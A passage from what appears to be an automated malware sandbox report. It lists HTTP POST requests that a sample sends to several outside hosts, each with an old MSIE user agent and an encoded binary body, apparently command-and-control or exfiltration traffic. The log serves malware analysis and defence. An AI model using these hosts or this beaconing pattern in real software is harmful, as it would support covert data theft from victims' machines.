72 4d 55 5a 59 65 55 58 6a 71 62 52 4e 37 56 44 4a 4e 62 6e 43 51 2f 70 75 75 32 49 6a 58 6d 49 68 6f 61 69 55 36 51 74 41 4e 4c 39 50 51 64 4f 50 6f 74 4c 2b 39 65 38 43 7a 77 70 44 4b 2f 44 32 55 46 6f 46 65 50 4d 69 63 32 59 4c 78 2f 42 49 72 51 57 6a 39 69 6a 50 2f 42 7a 43 4f 51 50 32 6e 39 45 30 71 34 52 39 4d 4b 44 61 4f 6e 4a 71 47 4d 48 4b 6e 32 49 59 2b 57 52 6c 64 54 44 45 57 70 79 35 64 6c 73 39 45 4a 4c 54 76 58 38 6b 2f 6d 64 68 54 63 38 4a 6e 50 6e 45 4f 58 74 30 61 43 44 4d 46 6c 6c 44 73 64 6e 77 61 31 51 78 48 44 31 46 49 72 41 55 59 74 79 64 6e 72 Data Ascii: ywV9DetvlRPNluSAwkSQs1R9l4GxICmdT2Ctw28pyXDhN44OiQJ0t/i3x7zawlJVJUaZQhCXKtuSM4kMcINQCZ3Ri15JpYsckbjCZDRBKdokWxKPTZG1xOscOQwyI5nTjctSgnByGz1ZUFVnADxrGKOI2jYMV/UXgXLJI1bWrblqFIW3jz0u2/1XClOJe4cAez5aeJ49vG40m0bVuX/eM9+KNaWBnDfxQsJg6wxFv/TrGWvwV6gan0nnyrz9SYeefVqreEdbTedJkXg4Wm/N3Yom770iu/IxdEdficisvbAu/juMY32ltH7LzFZQgQYbRzWv2iMV0kvXxA0jiLv45NNf3keUd7VrqgS//+G6PrK2iJUfASPj5rMUZYeUXjqbRN7VDJNbnCQ/puu2IjXmIhoaiU6QtANL9PQdOPotL+9e8CzwpDK/D2UFoFePMic2YLx/BIrQWj9ijP/BzCOQP2n9E0q4R9MKDaOnJqGMHKn2IY+WRldTDEWpy5dls9EJLTvX8k/mdhTc8JnPnEOXt0aCDMFllDsdnwa1QxHD1FIrAUYtydnr
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 79 77 56 39 44 65 74 76 6c 52 50 4e 6c 75 53 41 77 6b 53 51 73 31 52 39 6c 34 47 78 49 43 6d 64 54 32 43 74 77 32 38 70 79 58 44 68 4e 34 34 4f 69 51 4a 30 74 2f 69 33 78 37 7a 61 77 6c 4a 56 4a 55 61 5a 51 68 43 58 4b 74 75 53 4d 34 6b 4d 63 49 4e 51 43 5a 33 52 69 31 35 4a 70 59 73 63 6b 62 6a 43 5a 44 52 42 4b 64 6f 6b 57 78 4b 50 54 5a 47 31 78 4f 73 63 4f 51 77 79 49 35 6e 54 6a 63 74 53 67 6e 42 79 47 7a 31 5a 55 46 56 6e 41 44 78 72 47 4b 4f 49 32 6a 59 4d 56 2f 55 58 67 58 4c 4a 49 31 62 57 72 62 6c 71 46 49 57 33 6a 7a 30 75 32 2f 31 58 43 6c 4f 4a 65 34 63 41 65 7a 35 61 65 4a 34 39 76 47 34 30 6d 30 62 56 75 58 2f 65 4d 39 2b 4b 4e 61 57 42 6e 44 66 78 51 73 4a 67 36 77 78 46 76 2f 54 72 47 57 76 77 56 36 67 61 6e 30 6e 6e 79 72 7a 39 53 59 65 65 66 56 71 72 65 45 64 62 54 65 64 4a 6b 58 67 34 57 6d 2f 4e 33 59 6f 6d 37 37 30 69 75 2f 49 78 64 45 64 66 69 63 69 73 76 62 41 75 2f 6a 75 4d 59 33 32 6c 74 48 37 4c 7a 46 5a 51 67 51 59 62 52 7a 57 76 32 69 4d 56 30 6b 76 58 78 41 30 6a 69 4c 76 34 35 4e 4e 66 33 6b 65 55 64 37 56 72 71 67 53 2f 2f 2b 47 36 50 72 4b 32 69 4a 55 66 41 53 50 6a 35 72 4d 55 5a 59 65 55 58 6a 71 62 52 4e 37 56 44 4a 4e 62 6e 43 51 2f 70 75 75 32 49 6a 58 6d 49 68 6f 61 69 55 36 51 74 41 4e 4c 39 50 51 64 4f 50 6f 74 4c 2b 39 65 38 43 7a 77 70 44 4b 2f 44 32 55 46 6f 46 65 50 4d 69 63 32 59 4c 78 2f 42 49 72 51 57 6a 39 69 6a 50 2f 42 7a 43 4f 51 50 32 6e 39 45 30 71 34 52 39 4d 4b 44 61 4f 6e 4a 71 47 4d 48 4b 6e 32 49 59 2b 57 52 6c 64 54 44 45 57 70 79 35 64 6c 73 39 45 4a 4c 54 76 58 38 6b 2f 6d 64 68 54 63 38 4a 6e 50 6e 45 4f 58 74 30 61 43 44 4d 46 6c 6c 44 73 64 6e 77 61 31 51 78 48 44 31 46 49 72 41 55 59 74 79 64 6e 72 Data Ascii: ywV9DetvlRPNluSAwkSQs1R9l4GxICmdT2Ctw28pyXDhN44OiQJ0t/i3x7zawlJVJUaZQhCXKtuSM4kMcINQCZ3Ri15JpYsckbjCZDRBKdokWxKPTZG1xOscOQwyI5nTjctSgnByGz1ZUFVnADxrGKOI2jYMV/UXgXLJI1bWrblqFIW3jz0u2/1XClOJe4cAez5aeJ49vG40m0bVuX/eM9+KNaWBnDfxQsJg6wxFv/TrGWvwV6gan0nnyrz9SYeefVqreEdbTedJkXg4Wm/N3Yom770iu/IxdEdficisvbAu/juMY32ltH7LzFZQgQYbRzWv2iMV0kvXxA0jiLv45NNf3keUd7VrqgS//+G6PrK2iJUfASPj5rMUZYeUXjqbRN7VDJNbnCQ/puu2IjXmIhoaiU6QtANL9PQdOPotL+9e8CzwpDK/D2UFoFePMic2YLx/BIrQWj9ijP/BzCOQP2n9E0q4R9MKDaOnJqGMHKn2IY+WRldTDEWpy5dls9EJLTvX8k/mdhTc8JnPnEOXt0aCDMFllDsdnwa1QxHD1FIrAUYtydnr
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 78 67 7a 34 69 4b 38 44 77 78 4f 79 56 55 33 79 7a 74 33 6b 54 4c 68 35 71 4f 2f 46 6d 56 6d 65 55 2f 5a 34 75 56 6d 4b 74 68 36 56 52 73 58 33 42 71 53 2f 62 73 32 4c 51 6b 5a 78 7a 33 47 44 74 76 39 73 72 38 6a 39 7a 35 70 43 35 30 49 30 61 65 69 62 49 42 73 68 5a 6d 59 2b 37 32 59 54 44 50 59 4a 32 5a 4a 4d 6e 54 51 4f 47 77 71 38 54 76 4a 64 41 59 54 63 4f 7a 71 47 4c 4a 59 64 6f 73 4e 70 2b 5a 67 68 61 66 46 75 48 2f 62 55 67 30 79 4b 75 57 74 54 36 6d 69 55 75 39 46 7a 4a 48 6b 59 2f 67 74 4a 52 4c 4e 57 69 5a 62 70 48 2b 63 6d 70 36 38 73 43 61 4f 6d 55 6e 51 6d 6b 59 36 2b 50 77 61 51 55 62 43 6c 34 6b 6d 2b 36 38 2b 33 4a 56 68 4e 43 4f 34 69 42 68 6c 69 58 67 6d 30 76 67 79 2f 6d 77 53 78 74 4f 30 61 47 6e 5a 67 72 57 6a 4f 71 59 5a 43 46 58 54 34 6a 69 47 54 6e 53 36 36 33 70 39 62 63 38 53 6b 49 6c 41 61 59 59 6e 57 34 6a 4f 78 62 59 72 47 50 31 44 75 4a 4d 34 41 4d 59 38 48 74 4b 62 7a 51 41 2f 67 34 44 41 56 53 69 41 48 69 30 49 42 4c 5a 66 4b 36 38 2b 75 47 42 7a 6d 6c 33 47 69 51 72 49 4b 33 5a 52 2b 48 72 54 6f 58 4a 5a 4a 41 7a 51 42 6b 4b 6e 35 6b 66 61 57 4c 77 34 2f 6a 34 6a 66 52 74 77 5a 61 55 4c 4e 6b 46 59 71 4c 4e 48 38 42 6f 35 61 62 33 57 4f 49 7a 56 4f 6e 57 65 4f 57 32 78 30 7a 45 53 57 66 56 63 32 72 4d 7a 37 59 48 34 33 61 54 31 55 61 77 59 78 6a 6a 4b 52 39 54 71 65 4a 4e 66 53 38 55 31 78 44 59 48 2b 35 51 72 33 46 6e 66 6f 59 41 70 42 2f 4f 33 69 33 76 43 6a 69 5a 58 64 4d 71 33 30 35 45 73 48 2b 50 38 72 61 71 72 4c 6f 54 70 4c 38 54 61 47 49 50 58 31 50 52 4c 39 41 37 62 54 68 72 63 76 4a 53 6c 62 62 79 4b 6f 35 59 4e 77 58 6b 78 71 4e 4a 6e 34 75 63 4e 63 51 70 67 4c 4d 55 53 79 39 64 75 6b 58 62 2b 57 34 59 30 3d Data Ascii: xgz4iK8DwxOyVU3yzt3kTLh5qO/FmVmeU/Z4uVmKth6VRsX3BqS/bs2LQkZxz3GDtv9sr8j9z5pC50I0aeibIBshZmY+72YTDPYJ2ZJMnTQOGwq8TvJdAYTcOzqGLJYdosNp+ZghafFuH/bUg0yKuWtT6miUu9FzJHkY/gtJRLNWiZbpH+cmp68sCaOmUnQmkY6+PwaQUbCl4km+68+3JVhNCO4iBhliXgm0vgy/mwSxtO0aGnZgrWjOqYZCFXT4jiGTnS663p9bc8SkIlAaYYnW4jOxbYrGP1DuJM4AMY8HtKbzQA/g4DAVSiAHi0IBLZfK68+uGBzml3GiQrIK3ZR+HrToXJZJAzQBkKn5kfaWLw4/j4jfRtwZaULNkFYqLNH8Bo5ab3WOIzVOnWeOW2x0zESWfVc2rMz7YH43aT1UawYxjjKR9TqeJNfS8U1xDYH+5Qr3FnfoYApB/O3i3vCjiZXdMq305EsH+P8raqrLoTpL8TaGIPX1PRL9A7bThrcvJSlbbyKo5YNwXkxqNJn4ucNcQpgLMUSy9dukXb+W4Y0=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 2f 69 68 42 34 44 4a 49 6e 42 50 72 5a 59 2f 5a 5a 59 6b 45 6a 54 58 49 58 61 77 43 6d 4e 59 61 68 76 46 46 72 64 55 2f 7a 4b 78 43 4f 41 30 61 33 56 68 53 55 69 35 73 5a 34 41 4f 78 30 76 77 78 59 77 75 68 43 54 47 46 31 66 50 30 6a 36 37 69 76 6a 65 35 74 50 75 41 45 6c 46 76 77 78 2f 6a 34 50 62 2b 53 30 66 4b 66 54 50 2b 49 77 4f 4e 57 39 45 36 74 54 55 2f 35 67 45 32 30 46 54 68 6c 73 62 5a 42 31 78 50 48 58 58 5a 4d 31 68 74 5a 41 59 34 4e 4b 76 76 69 46 42 4c 4a 6a 71 79 63 4f 72 34 62 54 68 4c 39 41 6e 34 44 63 37 4a 75 46 4b 36 58 66 67 4c 2b 64 7a 32 72 75 47 64 4e 42 37 77 2b 33 7a 77 52 7a 58 5a 46 6c 52 69 4d 50 53 2b 75 6a 42 43 2f 30 4f 44 4c 2f 34 65 46 33 4a 77 39 6f 32 57 71 51 34 6e 75 42 77 68 6a 70 76 44 6c 63 70 55 44 56 2f 4f 69 4d 63 72 47 59 71 6d 4d 32 6f 52 61 62 76 75 6c 79 58 43 55 62 6f 4b 47 4c 58 35 43 4e 49 6b 4b 48 62 37 57 43 56 4a 5a 64 31 31 6e 49 79 4b 70 70 73 64 6f 46 67 35 74 49 2b 4a 42 76 59 2b 4c 33 70 79 53 67 2b 63 77 71 4a 51 78 42 4c 59 52 4a 4a 41 54 4a 67 46 48 50 7a 47 39 46 7a 6d 44 55 69 6b 46 42 6e 41 38 53 39 75 58 4e 7a 6c 49 69 31 54 33 37 31 4c 72 75 59 4f 39 58 5a 32 74 69 73 79 56 48 7a 45 55 75 57 52 2f 55 47 44 45 58 32 44 6a 50 43 70 69 33 67 76 56 30 5a 30 6a 72 41 55 62 51 36 58 6c 66 48 61 30 56 55 4d 58 4a 39 59 50 2f 39 2f 73 65 77 75 31 51 53 6d 53 41 43 61 4f 54 62 48 4c 4c 78 73 69 59 2f 64 6c 4f 48 78 39 59 67 4f 56 5a 43 6b 57 76 4f 36 76 47 37 37 33 76 75 6e 32 6b 77 55 6d 37 52 51 33 4f 51 35 55 69 62 73 46 62 66 53 56 4c 51 6b 75 35 43 6b 48 69 4b 4d 70 6b 79 49 73 35 4b 45 4c 55 44 41 2f 45 77 59 71 53 31 57 49 56 4d 54 45 55 64 63 6a 49 45 52 6a 42 45 45 32 52 45 50 51 30 35 46 2f 64 59 49 4d 59 7a 4a 74 57 39 50 31 53 56 55 7a 73 4e 36 71 32 38 4e 42 41 3d Data Ascii: /ihB4DJInBPrZY/ZZYkEjTXIXawCmNYahvFFrdU/zKxCOA0a3VhSUi5sZ4AOx0vwxYwuhCTGF1fP0j67ivje5tPuAElFvwx/j4Pb+S0fKfTP+IwONW9E6tTU/5gE20FThlsbZB1xPHXXZM1htZAY4NKvviFBLJjqycOr4bThL9An4Dc7JuFK6XfgL+dz2ruGdNB7w+3zwRzXZFlRiMPS+ujBC/0ODL/4eF3Jw9o2WqQ4nuBwhjpvDlcpUDV/OiMcrGYqmM2oRabvulyXCUboKGLX5CNIkKHb7WCVJZd11nIyKppsdoFg5tI+JBvY+L3pySg+cwqJQxBLYRJJATJgFHPzG9FzmDUikFBnA8S9uXNzlIi1T371LruYO9XZ2tisyVHzEUuWR/UGDEX2DjPCpi3gvV0Z0jrAUbQ6XlfHa0VUMXJ9YP/9/sewu1QSmSACaOTbHLLxsiY/dlOHx9YgOVZCkWvO6vG773vun2kwUm7RQ3OQ5UibsFbfSVLQku5CkHiKMpkyIs5KELUDA/EwYqS1WIVMTEUdcjIERjBEE2REPQ05F/dYIMYzJtW9P1SVUzsN6q28NBA=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 44 46 32 59 66 77 51 47 79 78 4f 69 56 36 69 49 48 39 6d 48 75 4e 65 54 59 50 73 38 39 31 65 34 65 50 4e 4a 44 30 48 59 5a 6a 4d 35 58 6d 57 30 41 73 2b 61 69 62 36 72 33 51 48 36 44 37 54 48 35 51 78 49 48 44 52 79 73 45 74 6f 64 49 62 55 46 42 66 4f 47 32 4c 6b 62 4f 2f 62 67 51 53 73 37 37 56 6e 5a 4e 54 49 75 54 42 59 73 52 6f 42 33 47 6a 38 47 4a 66 30 53 6c 7a 4a 55 53 4c 32 70 66 6a 4f 71 47 4b 46 77 6d 70 4d 72 4d 58 74 44 33 79 36 39 76 49 31 44 65 59 2b 55 50 62 33 4a 55 70 51 39 4b 72 6e 30 4c 59 4f 71 4d 61 4b 71 72 78 48 33 4a 49 53 54 63 2f 4a 77 52 31 72 4b 32 33 49 43 6b 71 5a 54 59 6a 42 61 67 32 52 48 63 42 77 49 66 71 70 65 50 37 4f 70 47 6e 37 71 38 58 6e 41 72 64 70 4f 47 46 47 75 5a 38 36 44 79 4c 7a 66 4f 58 46 42 52 50 38 71 4f 32 66 41 71 76 77 4e 5a 30 4e 69 78 58 61 6b 42 37 76 56 6b 57 65 58 46 4d 61 71 46 41 6b 39 37 4a 4d 6a 62 47 4f 54 57 69 6c 77 54 45 32 79 32 42 57 36 62 76 6c 49 35 6a 74 6a 50 64 48 7a 54 46 52 65 53 66 54 49 59 66 36 63 2b 52 30 69 47 39 35 44 66 31 68 74 67 41 50 31 68 54 74 6f 5a 67 39 6d 50 78 73 69 4a 4c 61 66 44 33 34 42 39 66 30 62 66 54 62 54 74 37 67 47 4d 66 6a 57 54 47 43 6f 44 59 69 70 6b 51 54 6e 4e 4a 65 59 4f 2b 4a 32 74 2b 69 6f 44 56 61 68 32 53 30 53 64 6d 6c 59 56 35 67 65 72 78 4e 6d 6a 53 6e 4d 64 7a 76 74 32 76 4e 65 61 35 4d 73 61 6a 55 6d 6d 37 6c 7a 43 4a 33 7a 56 44 7a 50 30 69 38 41 6a 51 52 2b 62 78 59 6d 61 37 36 64 74 45 66 79 79 4c 48 54 4a 69 7a 53 56 4d 34 74 6a 4c 4f 50 56 37 48 6d 65 76 7a 33 31 62 59 68 43 51 48 62 71 76 79 7a 6a 6f 61 67 4a 6d 77 7a 58 32 44 6f 31 41 74 59 46 47 4b 42 35 32 7a 44 53 36 6f 64 43 53 4c 4d 36 6f 54 53 68 64 35 36 79 41 6f 52 4c 75 64 59 38 38 41 41 76 30 54 31 75 34 3d Data Ascii: DF2YfwQGyxOiV6iIH9mHuNeTYPs891e4ePNJD0HYZjM5XmW0As+aib6r3QH6D7TH5QxIHDRysEtodIbUFBfOG2LkbO/bgQSs77VnZNTIuTBYsRoB3Gj8GJf0SlzJUSL2pfjOqGKFwmpMrMXtD3y69vI1DeY+UPb3JUpQ9Krn0LYOqMaKqrxH3JISTc/JwR1rK23ICkqZTYjBag2RHcBwIfqpeP7OpGn7q8XnArdpOGFGuZ86DyLzfOXFBRP8qO2fAqvwNZ0NixXakB7vVkWeXFMaqFAk97JMjbGOTWilwTE2y2BW6bvlI5jtjPdHzTFReSfTIYf6c+R0iG95Df1htgAP1hTtoZg9mPxsiJLafD34B9f0bfTbTt7gGMfjWTGCoDYipkQTnNJeYO+J2t+ioDVah2S0SdmlYV5gerxNmjSnMdzvt2vNea5MsajUmm7lzCJ3zVDzP0i8AjQR+bxYma76dtEfyyLHTJizSVM4tjLOPV7Hmevz31bYhCQHbqvyzjoagJmwzX2Do1AtYFGKB52zDS6odCSLM6oTShd56yAoRLudY88AAv0T1u4=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 53 69 54 39 6a 73 41 31 77 78 4d 35 78 77 63 5a 6b 79 36 44 52 50 4f 6d 66 33 79 6f 31 30 53 47 39 4b 44 4c 4b 55 48 75 65 32 58 53 77 4c 44 62 78 53 55 53 72 70 57 49 6b 2b 50 41 78 6f 75 57 4b 47 66 51 6e 4d 42 4b 38 43 79 46 32 4d 59 2b 55 44 79 42 35 77 63 7a 4b 78 4b 70 31 44 61 33 51 4a 32 63 54 45 57 54 37 69 4c 36 38 74 6c 68 38 73 43 31 44 36 74 55 4d 6b 56 4c 53 4a 49 45 68 43 6a 55 75 49 36 6a 4e 37 38 6a 6d 47 46 5a 77 6b 2b 69 6e 77 4c 79 6c 43 45 37 31 57 47 30 46 45 61 6c 47 7a 66 2f 78 72 6f 74 52 47 75 62 35 65 74 39 2b 35 50 31 42 34 64 2b 6d 45 30 31 41 78 6d 56 42 47 56 4e 68 4c 69 7a 70 4d 74 76 6b 6e 4b 53 34 6c 45 6e 61 2b 61 5a 63 39 72 73 57 47 33 57 66 49 38 5a 48 75 4c 44 45 48 6a 41 46 7a 39 57 36 4d 4d 6c 6a 6d 52 50 35 66 51 75 41 32 50 66 2b 76 75 50 47 2f 37 6b 44 4b 4e 54 7a 65 36 4f 44 70 41 72 2f 50 58 39 2b 63 6b 4c 72 4b 77 79 49 53 50 65 38 39 45 4c 7a 53 42 64 4c 70 33 75 78 58 58 4c 78 61 42 6f 6a 73 41 65 6f 70 4c 67 6c 72 7a 4d 71 59 58 78 58 47 73 4e 43 31 32 61 54 71 7a 44 66 78 6b 41 4a 6c 52 58 61 76 38 73 39 77 70 6d 34 42 59 71 58 31 6f 76 72 66 79 43 76 5a 4f 6e 64 57 36 44 76 37 58 57 79 4b 34 66 67 4f 74 77 4d 6f 4c 72 6a 41 64 7a 47 34 35 30 59 42 43 34 59 64 58 64 78 6e 6c 63 42 32 56 42 64 6b 2f 39 6a 4d 48 45 74 58 78 37 59 4d 4e 6c 4b 5a 75 73 4a 62 46 65 34 78 33 77 6b 76 44 34 4f 36 30 64 5a 4c 34 56 50 59 72 57 64 41 34 55 6d 62 72 65 79 41 2b 4c 6d 5a 34 72 50 59 39 56 5a 68 4f 4d 37 73 30 2b 45 63 6f 63 59 6f 79 71 5a 6f 4a 34 54 6f 49 31 44 5a 38 33 67 42 2f 70 72 53 76 56 66 65 53 33 53 57 61 58 6e 61 66 67 42 4d 6d 4a 57 71 36 77 79 71 6f 34 74 63 37 51 63 59 41 41 75 46 37 74 63 65 4a 4d 44 72 6e 33 Data Ascii: SiT9jsA1wxM5xwcZky6DRPOmf3yo10SG9KDLKUHue2XSwLDbxSUSrpWIk+PAxouWKGfQnMBK8CyF2MY+UDyB5wczKxKp1Da3QJ2cTEWT7iL68tlh8sC1D6tUMkVLSJIEhCjUuI6jN78jmGFZwk+inwLylCE71WG0FEalGzf/xrotRGub5et9+5P1B4d+mE01AxmVBGVNhLizpMtvknKS4lEna+aZc9rsWG3WfI8ZHuLDEHjAFz9W6MMljmRP5fQuA2Pf+vuPG/7kDKNTze6ODpAr/PX9+ckLrKwyISPe89ELzSBdLp3uxXXLxaBojsAeopLglrzMqYXxXGsNC12aTqzDfxkAJlRXav8s9wpm4BYqX1ovrfyCvZOndW6Dv7XWyK4fgOtwMoLrjAdzG450YBC4YdXdxnlcB2VBdk/9jMHEtXx7YMNlKZusJbFe4x3wkvD4O60dZL4VPYrWdA4UmbreyA+LmZ4rPY9VZhOM7s0+EcocYoyqZoJ4ToI1DZ83gB/prSvVfeS3SWaXnafgBMmJWq6wyqo4tc7QcYAAuF7tceJMDrn3
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 78 67 7a 34 69 4b 38 44 77 78 4f 79 56 55 33 79 7a 74 33 6b 54 4c 68 35 71 4f 2f 46 6d 56 6d 65 55 2f 5a 34 75 56 6d 4b 74 68 36 56 52 73 58 33 42 71 53 2f 62 73 32 4c 51 6b 5a 78 7a 33 47 44 74 76 39 73 72 38 6a 39 7a 35 70 43 35 30 49 30 61 65 69 62 49 42 73 68 5a 6d 59 2b 37 32 59 54 44 50 59 4a 32 5a 4a 4d 6e 54 51 4f 47 77 71 38 54 76 4a 64 41 59 54 63 4f 7a 71 47 4c 4a 59 64 6f 73 4e 70 2b 5a 67 68 61 66 46 75 48 2f 62 55 67 30 79 4b 75 57 74 54 36 6d 69 55 75 39 46 7a 4a 48 6b 59 2f 67 74 4a 52 4c 4e 57 69 5a 62 70 48 2b 63 6d 70 36 38 73 43 61 4f 6d 55 6e 51 6d 6b 59 36 2b 50 77 61 51 55 62 43 6c 34 6b 6d 2b 36 38 2b 33 4a 56 68 4e 43 4f 34 69 42 68 6c 69 58 67 6d 30 76 67 79 2f 6d 77 53 78 74 4f 30 61 47 6e 5a 67 72 57 6a 4f 71 59 5a 43 46 58 54 34 6a 69 47 54 6e 53 36 36 33 70 39 62 63 38 53 6b 49 6c 41 61 59 59 6e 57 34 6a 4f 78 62 59 72 47 50 31 44 75 4a 4d 34 41 4d 59 38 48 74 4b 62 7a 51 41 2f 67 34 44 41 56 53 69 41 48 69 30 49 42 4c 5a 66 4b 36 38 2b 75 47 42 7a 6d 6c 33 47 69 51 72 49 4b 33 5a 52 2b 48 72 54 6f 58 4a 5a 4a 41 7a 51 42 6b 4b 6e 35 6b 66 61 57 4c 77 34 2f 6a 34 6a 66 52 74 77 5a 61 55 4c 4e 6b 46 59 71 4c 4e 48 38 42 6f 35 61 62 33 57 4f 49 7a 56 4f 6e 57 65 4f 57 32 78 30 7a 45 53 57 66 56 63 32 72 4d 7a 37 59 48 34 33 61 54 31 55 61 77 59 78 6a 6a 4b 52 39 54 71 65 4a 4e 66 53 38 55 31 78 44 59 48 2b 35 51 72 33 46 6e 66 6f 59 41 70 42 2f 4f 33 69 33 76 43 6a 69 5a 58 64 4d 71 33 30 35 45 73 48 2b 50 38 72 61 71 72 4c 6f 54 70 4c 38 54 61 47 49 50 58 31 50 52 4c 39 41 37 62 54 68 72 63 76 4a 53 6c 62 62 79 4b 6f 35 59 4e 77 58 6b 78 71 4e 4a 6e 34 75 63 4e 63 51 70 67 4c 4d 55 53 79 39 64 75 6b 58 62 2b 57 34 59 30 3d Data Ascii: xgz4iK8DwxOyVU3yzt3kTLh5qO/FmVmeU/Z4uVmKth6VRsX3BqS/bs2LQkZxz3GDtv9sr8j9z5pC50I0aeibIBshZmY+72YTDPYJ2ZJMnTQOGwq8TvJdAYTcOzqGLJYdosNp+ZghafFuH/bUg0yKuWtT6miUu9FzJHkY/gtJRLNWiZbpH+cmp68sCaOmUnQmkY6+PwaQUbCl4km+68+3JVhNCO4iBhliXgm0vgy/mwSxtO0aGnZgrWjOqYZCFXT4jiGTnS663p9bc8SkIlAaYYnW4jOxbYrGP1DuJM4AMY8HtKbzQA/g4DAVSiAHi0IBLZfK68+uGBzml3GiQrIK3ZR+HrToXJZJAzQBkKn5kfaWLw4/j4jfRtwZaULNkFYqLNH8Bo5ab3WOIzVOnWeOW2x0zESWfVc2rMz7YH43aT1UawYxjjKR9TqeJNfS8U1xDYH+5Qr3FnfoYApB/O3i3vCjiZXdMq305EsH+P8raqrLoTpL8TaGIPX1PRL9A7bThrcvJSlbbyKo5YNwXkxqNJn4ucNcQpgLMUSy9dukXb+W4Y0=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 6e 77 76 37 56 6b 30 32 44 42 52 6f 4e 54 5a 47 78 47 4d 31 62 41 61 73 75 37 4b 37 2b 2f 77 56 30 53 74 49 61 6a 4f 79 36 59 4f 6b 31 41 53 4d 2f 50 67 2b 53 54 55 4c 62 6e 65 64 66 36 68 6e 4b 6c 51 53 55 30 48 48 75 62 67 66 4a 48 43 63 57 4b 73 6d 53 6b 77 71 47 54 4e 64 30 2b 4f 38 4d 2f 30 6b 59 44 44 46 67 49 68 54 61 53 61 30 4f 61 70 63 32 6a 47 4d 46 63 52 31 38 2f 72 72 2f 4a 65 79 48 42 51 41 2f 6e 4a 4c 4a 44 45 48 6f 63 6e 48 56 48 78 73 6a 6e 67 6f 4c 64 70 49 33 41 63 30 62 78 68 6b 58 45 6b 34 39 4e 74 79 57 59 66 36 77 79 6b 4d 52 53 6c 41 34 73 33 62 51 37 4e 55 63 4c 73 6f 39 31 66 56 4c 30 41 76 52 59 6a 69 50 74 43 61 35 6e 4b 31 4b 61 6f 6d 62 73 56 63 6f 45 33 33 35 38 61 64 4a 56 57 47 6c 6a 79 55 52 33 56 38 6c 36 37 47 64 4b 45 78 62 62 6e 79 45 47 61 71 45 33 61 77 38 4f 50 51 70 50 67 56 56 41 43 4d 43 51 6e 6d 6d 39 2b 39 4d 78 75 53 66 5a 54 48 6d 74 47 6d 76 5a 71 43 2f 77 4c 6c 67 6e 69 30 4e 45 68 63 6d 47 64 72 7a 2b 30 62 70 77 49 63 49 45 74 50 79 5a 51 70 33 46 65 65 4e 46 47 75 67 4f 73 66 6d 72 50 4e 36 77 6d 67 53 30 30 6a 51 5a 64 76 43 4c 46 58 45 76 39 45 48 34 64 56 65 63 4b 33 73 77 4e 4a 79 6b 47 53 68 50 42 33 53 69 55 32 35 41 4b 68 67 7a 66 63 31 6b 36 6c 39 58 72 41 6a 5a 46 4e 6e 42 74 31 6d 6a 42 6c 30 67 72 72 5a 30 37 4e 67 55 2b 4f 4a 47 33 38 34 75 51 6c 42 6e 36 49 46 33 4f 78 61 55 46 54 52 4d 37 63 79 45 32 68 6c 4a 61 39 4a 75 48 52 46 71 46 70 6c 4c 73 57 44 55 59 63 62 38 75 38 63 4e 45 50 6d 61 4c 46 72 56 74 4d 47 50 77 71 33 68 32 79 4c 31 31 54 79 41 33 66 53 58 50 71 77 72 71 77 6e 38 4a 4c 44 4f 64 62 6d 71 37 66 61 45 66 34 4e 72 51 66 70 48 72 77 36 54 4a 72 55 74 36 36 44 48 38 4f 77 31 45 78 71 73 59 68 34 66 6f 3d Data Ascii: nwv7Vk02DBRoNTZGxGM1bAasu7K7+/wV0StIajOy6YOk1ASM/Pg+STULbnedf6hnKlQSU0HHubgfJHCcWKsmSkwqGTNd0+O8M/0kYDDFgIhTaSa0Oapc2jGMFcR18/rr/JeyHBQA/nJLJDEHocnHVHxsjngoLdpI3Ac0bxhkXEk49NtyWYf6wykMRSlA4s3bQ7NUcLso91fVL0AvRYjiPtCa5nK1KaombsVcoE3358adJVWGljyUR3V8l67GdKExbbnyEGaqE3aw8OPQpPgVVACMCQnmm9+9MxuSfZTHmtGmvZqC/wLlgni0NEhcmGdrz+0bpwIcIEtPyZQp3FeeNFGugOsfmrPN6wmgS00jQZdvCLFXEv9EH4dVecK3swNJykGShPB3SiU25AKhgzfc1k6l9XrAjZFNnBt1mjBl0grrZ07NgU+OJG384uQlBn6IF3OxaUFTRM7cyE2hlJa9JuHRFqFplLsWDUYcb8u8cNEPmaLFrVtMGPwq3h2yL11TyA3fSXPqwrqwn8JLDOdbmq7faEf4NrQfpHrw6TJrUt66DH8Ow1ExqsYh4fo=
